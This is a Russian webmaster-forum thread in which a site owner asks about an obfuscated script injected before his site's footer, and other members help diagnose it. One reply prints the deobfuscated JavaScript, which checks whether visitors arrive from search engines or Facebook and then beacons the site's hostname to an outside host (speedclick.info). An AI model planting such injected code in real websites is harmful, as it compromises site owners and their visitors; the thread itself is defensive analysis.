Форум успешных вебмастеров - GoFuckBiz.com

  Форум успешных вебмастеров - GoFuckBiz.com > Бизнес-решения > Скрипты, программы и технические решения
Дата
USD/RUB58.7570
BTC/USD0.0000
Скрипты, программы и технические решения Обсуждаем скрипты, программы и новые технологии.

Закрытая тема
Опции темы Опции просмотра
Старый 22.09.2015, 22:20   #1
Vincenzo
Senior Member
 
Аватар для Vincenzo
 
Регистрация: 20.03.2014
Сообщений: 542
Бабло: $88489
Отправить сообщение для Vincenzo с помощью ICQ
По умолчанию Подозрительный скрипт на сайте

Хлопцы, пишет мне тут кореш
Цитата:
какой у тебя антивирус?
попробуй зайти на ________ - не появляется ниче?
и скрин дает



Смотрю обджект инспектором в хроме, вот такое дерьмо




http://g00.co/BtFVPd
http://yourjavascript.com/3921156982/not.js

Судя по тому, что на втором урле обфусцированный джс, че-то это нехорошее. Может кто подсказать шо это за дрянь и шо делать?

Дерьмо это сидит перед футером:



Спасибо

Последний раз редактировалось Vincenzo; 22.09.2015 в 22:28.
Vincenzo вне форума  
Старый 22.09.2015, 22:37   #2
alkoustas
Ебланнед
 
Регистрация: 08.04.2011
Адрес: Украина, Севастополь
Сообщений: 633
Бабло: $144424
По умолчанию

Offtopic

Цитата:
обфусцированный джс
открой да посмотри в каком нить фаербаге, в чем проблема то
alkoustas вне форума  
Старый 22.09.2015, 23:56   #3
Adrenalin
adrenalin.name
 
Регистрация: 03.05.2015
Сообщений: 81
Бабло: $12180
По умолчанию

Цитата:
Сообщение от Vincenzo Посмотреть сообщение
Может кто подсказать шо это за дрянь и шо делать?
Как минимум снести нахрен с хоста и просмотреть логи, как оно туда попало.

А шо это за дрянь подскажет Virus Total.
__________________
Не пью, не курю, не ругаюсь матом. При слове "жопа" падаю в обморок.

Последний раз редактировалось Adrenalin; 23.09.2015 в 00:04.
Adrenalin вне форума  
Старый 23.09.2015, 02:11   #4
Cannabis Cup
Senior Member
 
Регистрация: 09.07.2014
Адрес: ny
Сообщений: 2,127
Бабло: $296975
По умолчанию

пасаны кто заразил признавайтесь
Cannabis Cup вне форума  
Старый 23.09.2015, 02:15   #5
Vincenzo
Senior Member
 
Аватар для Vincenzo
 
Регистрация: 20.03.2014
Сообщений: 542
Бабло: $88489
ТС -->
Отправить сообщение для Vincenzo с помощью ICQ
автор темы ТС По умолчанию

Та уже из шаблона кореш удалил, будем логи смотреть. По вирус тоталу сразу посмотрел, пишет, что малишиос код. А шо за ботва - хз.

Цитата:
Сообщение от Cannabis Cup Посмотреть сообщение
пасаны кто заразил признавайтесь
Ну, найду чей-то дор - солью на свой акк
Vincenzo вне форума  
Старый 23.09.2015, 03:13   #6
editeur
Senior Member
 
Регистрация: 27.09.2013
Сообщений: 620
Бабло: $89330
По умолчанию

Вот такое там вызывается

Код:
function notificar() {
    if (window.XMLHttpRequest) xmlhttp = new XMLHttpRequest();
    else xmlhttp = new ActiveXObject("Microsoft.XMLHTTP");
    var host = window.location.hostname;
    xmlhttp.open("GET", "http://speedclick.info/app/amung.php?c=a&s=" + host, false);
    xmlhttp.send();
    //return false;
}
var x = document.referrer;
var f = x.search("facebook");
var g = x.search("google");
var m = x.search("bing");
var y = x.search("yahoo");
if (f > 0 || g > 0 || m > 0 || y > 0) {
    notificar();
}
если по рефереру видно, что переход из поисковиков или фейсбука, делается запрос на h__p://speedclick.info/app/amung.php?c=a&s=твойдомен
editeur вне форума  
Старый 23.09.2015, 03:51   #7
Vincenzo
Senior Member
 
Аватар для Vincenzo
 
Регистрация: 20.03.2014
Сообщений: 542
Бабло: $88489
ТС -->
Отправить сообщение для Vincenzo с помощью ICQ
автор темы ТС По умолчанию

Цитата:
Сообщение от editeur Посмотреть сообщение
если по рефереру видно, что переход из поисковиков или фейсбука, делается запрос на h__p://speedclick.info/app/amung.php?c=a&s=твойдомен
Ебаный стыд. Спасибо за помощь, будем искать источник и дыры.
Vincenzo вне форума